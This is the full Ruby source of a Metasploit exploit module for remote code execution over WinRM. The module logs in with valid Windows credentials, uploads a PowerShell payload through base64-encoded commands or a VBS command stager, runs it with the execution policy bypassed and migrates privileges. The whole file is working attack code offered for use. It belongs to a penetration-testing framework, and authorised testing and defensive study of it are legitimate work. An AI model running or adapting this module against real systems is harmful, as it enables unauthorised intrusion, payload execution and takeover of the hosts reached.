metasploit-gs/modules/exploits/windows/winrm/winrm_script_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/winrm/connection'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::WinRM
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WinRM Script Exec Remote Code Execution',
        'Description' => %q{
          This module uses valid credentials to login to the WinRM service
          and execute a payload. It has two available methods for payload
          delivery: Powershell 2 (and above) and VBS CmdStager.

          The module will check if Powershell is available, and if so uses
          that method. Otherwise it falls back to the VBS CmdStager which is
          less stealthy.
        },
        'Author' => [ 'thelightcosine' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'WfsDelay' => 30,
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'CMDSTAGER::DECODER' => File.join(Rex::Exploitation::DATA_DIR, 'exploits', 'cmdstager', 'vbs_b64_sleep')
        },
        'Platform' => 'win',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-11-01',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptBool.new('FORCE_VBS', [ true, 'Force the module to use the VBS CmdStager', false]),
      ], self.class
    )
    deregister_options('CMDSTAGER::FLAVOR')
    @compat_mode = false
  end

  def exploit
    check_winrm_parameters
    self.conn = create_winrm_connection
    self.shell = conn.shell(:cmd, {})
    if powershell2?
      path = upload_script
      return if path.nil?

      exec_script(path)
    else
      execute_cmdstager({ flavor: :vbs })
    end
    handler
  end

  # Run the WinRM command
  def winrm_run_cmd(command)
    shell.run(command)
  end

  # Run the WinRM command on a background thread
  def winrm_run_cmd_async(command)
    framework.threads.spawn("winrm_script_exec keepalive worker", false) do
      begin
        winrm_run_cmd(command)
      ensure
        self.shell.close
      end
    end
  end

  # Execute a command on the WinRM shell (called via the VBS Stager)
  def execute_command(cmd, _opts)
    commands = cmd.split(/&/)
    commands.each do |command|
      if command.include? 'cscript'
        winrm_run_cmd_async(command)
      elsif command.include? 'del %TEMP%'
        next
      else
        winrm_run_cmd(command)
      end
    end
  end

  # Uploads a powershell script to the server
  # @return [String] Path to the uploaded script
  def upload_script
    tdir = temp_dir
    return if tdir.nil?

    path = tdir + '\\' + ::Rex::Text.rand_text_alpha(8) + '.ps1'
    print_status("Uploading powershell script to #{path} (This may take a few minutes)...")

    script = Msf::Util::EXE.to_win32pe_psh(framework, payload.encoded)
    # add a sleep to the script to give us enough time to migrate
    script << "\n Start-Sleep -s 20"
    script.each_line do |psline|
      # build our psh command to write out our psh script, meta eh?
      script_line = "Add-Content #{path} '#{psline.chomp}' "
      cmd = encoded_psh(script_line)
      winrm_run_cmd(cmd)
    end
    return path
  end

  # Executes the PowerShell script at the given path
  # @param [String] path Path to the uploaded script
  def exec_script(path)
    print_status('Attempting to execute script...')
    cmd = "#{@invoke_powershell} -ExecutionPolicy bypass -File #{path}"
    winrm_run_cmd_async(cmd)
  end

  # Create a command line to execute the provided script inline
  # @return [String] Command line argument to execute the provided command in the -EncodedCommand parameter
  def encoded_psh(script)
    script = Rex::Text.encode_base64(script.encode('utf-16le')).chomp

    return "#{@invoke_powershell} -encodedCommand #{script}"
  end

  # Gets the temporary directory of the remote shell
  # @return [String] The temporary directory of the remote shell
  def temp_dir
    print_status('Grabbing %TEMP%')
    cmd = 'echo %TEMP%'
    output = winrm_run_cmd(cmd)
    return output.stdout.chomp
  end

  # The architecture of the remote system
  def get_remote_arch
    wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
    resp = conn.run_wql(wql)
    addr_width = resp[:xml_fragment][0][:address_width]
    if addr_width == '64'
      return ARCH_X64
    else
      return ARCH_X86
    end
  end

  # Verifies that the remote architecture is compatible with our payload
  # @return [Boolean] Does the payload match the architecture?
  # @note Sets @compat_mode to true if running x86 payload on x64 arch
  def correct_payload_arch?
    @target_arch = get_remote_arch
    case @target_arch
    when ARCH_X64
      unless datastore['PAYLOAD'].include?(ARCH_X64)
        print_error('You selected an x86 payload for an x64 target...trying to run in compat mode')
        @compat_mode = true
        return false
      end
    when ARCH_X86
      if datastore['PAYLOAD'].include?(ARCH_X64)
        print_error('You selected an x64 payload for an x86 target')
        return false
      end
    end
    return true
  end

  # Is PowerShell version 2 (or above) available
  # @return [Boolean]
  # @note Sets @invoke_powershell based on whether @compat_mode is set - to potentially force the use of x86 PowerShell while on an x64 system
  def powershell2?
    if datastore['FORCE_VBS']
      print_status('User selected the FORCE_VBS option')
      return false
    end
    print_status('Checking for Powershell 2.0')
    output = winrm_run_cmd('powershell Get-Host')
    if output.stderr.include? 'not recognized'
      print_error('Powershell is not installed')
      return false
    end
    output.stdout.each_line do |line|
      next unless line.start_with? 'Version'

      major_version = line.match(/\d(?=\.)/)[0]
      if major_version == '1'
        print_error('The target is running an older version of Powershell')
        return false
      end
    end

    return false unless correct_payload_arch? || (@target_arch == ARCH_X64)

    if @compat_mode == true
      @invoke_powershell = '%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'
    else
      @invoke_powershell = 'powershell'
    end

    return true
  end

  # @return [WinRM::Shells::Cmd] The WinRM Shell object
  attr_accessor :shell

  # @return [Net::MsfWinRM::RexWinRMConnection] The WinRM connection
  attr_accessor :conn
end